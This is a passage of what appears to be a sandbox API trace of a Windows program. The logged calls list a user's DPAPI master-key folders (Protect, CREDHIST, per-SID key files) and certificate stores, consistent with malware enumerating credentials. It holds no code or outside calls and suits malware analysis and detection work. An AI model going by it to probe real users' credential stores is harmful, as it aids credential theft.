0x2e1620 [0220.253] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x64) returned 0x2d60e0 [0220.253] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.253] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.253] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bfe1300, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8bfe1300, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8bfe1300, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.253] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bfe1300, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8bfe1300, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8bfe1300, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.253] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bfe1300, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8bfe1300, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8bfe1300, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.254] GetLastError () returned 0x12 [0220.254] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0220.254] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.254] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x68) returned 0x2d60e0 [0220.254] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.254] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.255] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.255] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.255] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9512f400, ftLastWriteTime.dwHighDateTime=0x1d7050d, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0220.255] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.255] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500", cAlternateFileName="S-1-5-~1")) returned 1 [0220.256] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.256] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d61c0, Size=0xc4) returned 0x2f3978 [0220.256] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d61c0 [0220.256] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d61c0, Size=0xd0) returned 0x2d8c40 [0220.256] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.259] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.259] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2b9bd87, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cAlternateFileName="BE5B4F~1")) returned 1 [0220.259] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d60e0, Size=0xc4) returned 0x2f3978 [0220.259] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0220.259] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d60e0, Size=0xc4) returned 0x2f3978 [0220.259] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.259] GetLastError () returned 0x12 [0220.260] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x6103f6d0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6103f6d0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-4219442223-4223814209-3835049652-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0220.261] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d6150 [0220.261] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d61c0, Size=0xc6) returned 0x2f3978 [0220.261] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d61c0 [0220.261] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d61c0, Size=0xd0) returned 0x2d8c40 [0220.261] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-4219442223-4223814209-3835049652-1000\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x6103f6d0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6103f6d0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.262] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x30b088f0, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x6103f6d0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6103f6d0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.262] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x60ff3410, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x60ff3410, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x6103f6d0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="0d54d493-6e9c-42a6-a446-f32d03e369e3", cAlternateFileName="0D54D4~1")) returned 1 [0220.262] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d6150, Size=0xc6) returned 0x2f3978 [0220.262] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30ba0e70, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30ba0e70, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30ba0e70, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="bbf2fe4c-d1f1-40ab-8fc1-1022146f6c9a", cAlternateFileName="BBF2FE~1")) returned 1 [0220.262] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d6150, Size=0xc6) returned 0x2f3978 [0220.262] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x30bed130, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x30bed130, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x6108b990, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0220.262] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d6150, Size=0xc6) returned 0x2f3978 [0220.263] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.263] GetLastError () returned 0x12 [0220.263] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bba3b70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7bba3b70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9512f400, ftLastWriteTime.dwHighDateTime=0x1d7050d, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0220.263] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.263] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.263] GetLastError () returned 0x12 [0220.263] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0220.263] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.264] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x7e) returned 0x2fa200 [0220.264] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.264] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x88) returned 0x2e6040 [0220.264] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb468 [0220.265] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.265] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0220.265] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x7e) returned 0x2fa200 [0220.265] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x84) returned 0x2e6040 [0220.265] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x48) returned 0x2c6680 [0220.266] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x90) returned 0x2f3978 [0220.266] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.266] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.266] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0220.266] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x84) returned 0x2e6040 [0220.267] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x9e) returned 0x2f3978 [0220.267] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x54) returned 0x2e1620 [0220.267] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1620, Size=0xa8) returned 0x2f6e58 [0220.267] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.267] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.267] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795d9e30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.267] GetLastError () returned 0x12 [0220.268] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0220.268] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x84) returned 0x2e6040 [0220.268] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6630, Size=0x8e) returned 0x2f3978 [0220.268] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x4c) returned 0x2f8fe0 [0220.268] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2f6e58 [0220.268] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.269] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.269] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.269] GetLastError () returned 0x12 [0220.269] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0220.269] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x84) returned 0x2e6040 [0220.270] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6630, Size=0x8e) returned 0x2f3978 [0220.270] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x4c) returned 0x2f8fe0 [0220.270] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2f6e58 [0220.270] 